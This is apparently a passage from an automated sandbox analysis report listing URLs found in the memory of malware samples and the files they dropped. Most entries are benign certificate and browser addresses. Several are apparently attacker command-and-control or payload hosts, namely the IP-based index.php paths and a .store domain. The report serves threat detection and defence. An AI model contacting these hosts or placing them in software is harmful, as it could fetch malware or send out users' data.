Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/k
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.000000000135B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ockedCacheCounterMutexp
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/yA
Source: skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206S
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206g
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206s
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206s.exe
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/15.113.43/
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/15.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#7
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/6122658-3693405117-2476756634-1003
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/G
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3301444059.0000000000F49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/d
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5001
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;.
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpC
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpR
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedy
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded%
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedJ
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ta
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 167c7bdf2f.exe, 0000001D.00000003.3036036378.000000000133C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: file.exe, file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2439241086.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, HIDAFHDH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_498.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_498.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_498.4.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, HIDAFHDH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7653a162-6e50-4ab3-8f5c-f174d1923baf.tmp.9.dr	String found in binary or memory: https://clients2.google.com
Source: 7653a162-6e50-4ab3-8f5c-f174d1923baf.tmp.9.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_498.4.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_498.4.dr	String found in binary or memory: https://content.googleapis.com
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chromecache_498.4.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log9.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: HubApps Icons.7.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: 167c7bdf2f.exe, 00000018.00000003.2786165532.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2788660171.00000000054E3000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787761356.00000000054E2000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787796925.0000000005501000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787718763.00000000054DE000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940341468.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940593754.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940501775.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180558948.0000000005902000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180954161.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180798714.00000000058DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXID/
Source: 167c7bdf2f.exe, 00000018.00000003.2786165532.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2788660171.00000000054E3000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787761356.00000000054E2000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787796925.0000000005501000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787718763.00000000054DE000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940341468.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940593754.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940501775.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180558948.0000000005902000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180954161.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180798714.00000000058DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXIDv10m
Source: 167c7bdf2f.exe, 00000021.00000002.3303459395.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3236828828.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/8
Source: 167c7bdf2f.exe, 00000021.00000003.3236828828.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/C
Source: 167c7bdf2f.exe, 00000018.00000002.2879651443.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/a
